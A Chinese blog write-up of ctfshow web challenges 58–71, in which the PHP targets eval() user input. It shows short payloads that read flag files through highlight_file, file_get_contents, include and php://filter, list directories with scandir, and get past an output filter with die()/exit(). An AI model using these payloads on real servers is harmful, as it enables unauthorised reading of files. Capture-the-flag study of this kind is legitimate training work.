ctfshow之web58~web71

已于 2024-08-31 18:32:05 修改
阅读量1.6k 收藏 15
点赞数 17
分类专栏: ctfshow题目 文章标签: linux 运维 服务器 安全 php
于 2024-08-31 18:31:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74350234/article/details/141746877
版权

目录

web58

思路一:

思路二: 

思路三:  

 web59~web65

web66~web67

 web68~web70

web71

web58

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

PHP eval() 函数介绍

定义和用法
eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾(php代码语句,不能是简单的2+3)

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

 区分eval函数和system函数:http://t.csdnimg.cn/pD1Ow

再介绍一些执行系统命令的函数: 

但在本题这些函数都用不了

思路一:

这里介绍两个函数: 

  1. show_source();
  2. highlight_file();

 或者说这两个函数是一样的,只是名称不一样

用法:

highlight_file(filename,return)
//filename必选
//return可选

结果就是输出filename文件里面的代码(不会执行filename里面的运算或输出)并进行高亮显示

 payload:c=highlight_file("flag.php");  //注意这里是有分号的,因为eval函数执行的是php语句;

思路二: 

尝试文件读取函数file_get_contents(path),path参数必选,还有其他几个参数是可选,这里不赘述了

用法:file_get_contents() 把整个文件读入一个字符串中。

案例:

<?php
echo file_get_contents("test.txt");
?>

//输出This is a test file with test text.

payload:c=file_get_contents("flag.php");

payload:c=$a=file_get_contents("flag.php");echo $a;

//这两个应该都可以     

思路三:  

尝试文件包含函数:include()

 ‌include()函数‌是PHP中用于包含外部文件内容的函数。它允许在一个PHP文件中嵌入另一个文件的内容,这对于代码重用和模块化非常有用。include()函数的行为是,如果文件不存在,它只会发出一个警告,并且脚本会继续执行。

 可以通过使用伪协议对其内容执行输出

伪协议是PHP中一种特殊的数据URI方案,它允许在URL中直接包含数据或执行代码。通过使用伪协议,可以在不经过服务器文件系统的情况下直接读取或执行数据。

payload如下: 

 得到flag.php文件内容的base64编码,将其解码即可 

或者payload:

c=include(flag.php);echo $flag; 

 web59~web65

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

思路一和思路三在这几题中都可以白嫖

web66~web67

题目一样,使用c=highlight_file("flag.php");

说明flag不在flag.php文件里面;

那么我们应该查找目录结构中包含的文件:c=var_dump(scandir("."));或者c=print_r(scandir("."));

 scandir()从名字上看该函数就是扫描目录文件的,

  1. .和./都表示当前目录
  2. ../表示上一级目录
  3. /表示根目录

扫描根目录(c=var_dump(scandir("/"));发现了flag.txt

payload:c=highlight_file("/flag.txt");

 web68~web70

本题highlight_file()和show_source()都不能用;还是尝试include()

(经过查找目录,猜测flag应该在/flag.txt中)

补充:include包含的文件如果不是php文件或者说是html文件,那么会自动输出文件内容,不用写echo $flag

 当然本题还可以用伪协议php:filter,也是同样的效果

web71

发现有附件,打开提示

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

 ob_get_contents()是将缓冲区的内容输出,然后ob_end_clean()清空缓冲区,最后将缓冲区内容(flag)中的字符全部替换成?,最后输出;

这就是为什么我们执行命令后(c=include("/flag.txt");)输出的都是?????

既然eval函数后面的代码会影响我们的输出,那我们可以直接不执行后面的代码;

有两个函数可以停止后面代码的执行

  1. die();  //c=include("/flag.txt");die();
  2. exit(); //c=include("/flag.txt");exit();

 拿到flag

pink鱼
关注
  • 17
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1119
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2038
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
ctfshow web58
m0_69289738的博客
09-18 114
结果phpinfo被禁用了,那我们就查看不了被禁用的函数了。尝试读取文件,flag.php,发现可以查看源代码得答案。打算先使用PHPinfo看看禁用了哪些函数。尝试system("ls");
ctfshow-web入门-命令执行(web56、web57、web58
Welcome To Myon'Blog !
06-29 781
由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37。命令执行,需要严格的过滤,已测试,可绕。
ctfshow-web入门-命令执行(web71-web74)
Welcome To Myon'Blog !
06-30 502
我们直接在执行完 include 包含语句后执行 exit 强制退出,从而实现绕过 preg_replace 的执行。拿到 flag:ctfshow{3deb8d00-68e6-4c20-a971-3fbf3382ec45}拿到 flag:ctfshow{8fccf5bc-5681-4815-b7ce-0b81772b6f7c}拿到 flag:ctfshow{35309fb4-36c5-4080-874a-6eaa85e03ff0}才发现这道题给了 index.php 的源码。
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 798
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 648
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2947
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
ctfshow web 其他 web432--web449
2301_81040377的博客
06-22 960
看到了另外一种拼接字符的方法我觉得很神,但是由于太长不能正常传入。删除了很多,我们用reload重新下回来。python里面可以用分号执行多条语句。我没有写多因为payload是一样的打。
[ctfshow]web入门——命令执行(web54-web71
ShenZ的博客
12-01 4306
文章目录web54 web54
ctfshow-web21~28-WP
若谷的博客
02-08 569
这次种子没有给出,但发现一个关键地方,就是我们可以把传入的r设置为0,即?r=0,可以输出$rand的值,此时$rand=mt_rand()的值,也就是随机数的值。r=86715576,使得$rang=0,满足if((!得到种子为4188754181,因为$_COOKIE[‘token’]的值要等于两个随机数相加,于是我们写个脚本。第一,传入的token值经过md5加密后,第1位=第14位并且第14位=第17位。需要输入姓名和身份证,我们现在有了姓名,身份证模糊,那进行抓包爆破。
CTFSHOW web入门 web55
NNASJ的博客
01-31 345
需要注意的是Linux 系统下 php 接收上传文件的 post 包,默认会将文件保存在临时文件夹 /tmp/,文件名 phpXXXXXX,后面为随机字母,即:/tmp/phpXXXXXX。),数字,和点(.),但对点(.)的作用和用途不清楚,上网搜索了。发现可以采用通配符进行筛选,所以使用/bin目录下的base64进行匹配。在网上找到了大佬的另一种解题思路,通过上传文件,得到flag。如果要上传的文件能执行内容,需要添加内容/bin/sh。需要注意的是上传的时候文件名不一定是大写,要多上传几次。
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2421
ctfshow的命令执行(web72-77)
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
AsherGu的博客
08-29 1245
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
Linux字符设备驱动 -- regulator子系统
xi_xix_i的博客
09-01 830
Linux驱动之Regulator子系统Linux 内核之电源篇(加载流程)regulator,翻译就是调节器。一些可以输出电流电压的设备可以使用该子系统。举个例子,一个PMIC有多路输出,每一路输出都可以给很多外设、芯片供电。那么每一路输出,我都可以认为他是一个regulator。
linux 系统如何进行nfs(第五节)
weixin_44767571的博客
08-30 1018
首先是 在虚拟机中的操作。然后是在开发板上的操作。
Linux:vim编辑器的基本使用
最新发布
2401_86544677的博客
09-04 510
当然,也可以直接删除。vim可以直接用键盘上的光标来上下左右移动,但正规的vim是用小写英文字母「h」、「j」、「k」、「i」,分别控制光标左、下、上、右移一格。」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直 按「n」会往前寻找到您要的关键字为止。「#」:「#」号表示一个数字,在冒号后输入一个数字,再按回车键就会跳到该行了,如输入数字15, 再回车,就会跳到文章的第15行。「/关键字」: 先按「/」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直按。
Linux---文件(2)---文件描述符&&缓冲区(语言级)
m0_75102051的博客
09-03 587
本文介绍Linux中的文件描述符和语言级缓冲区
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值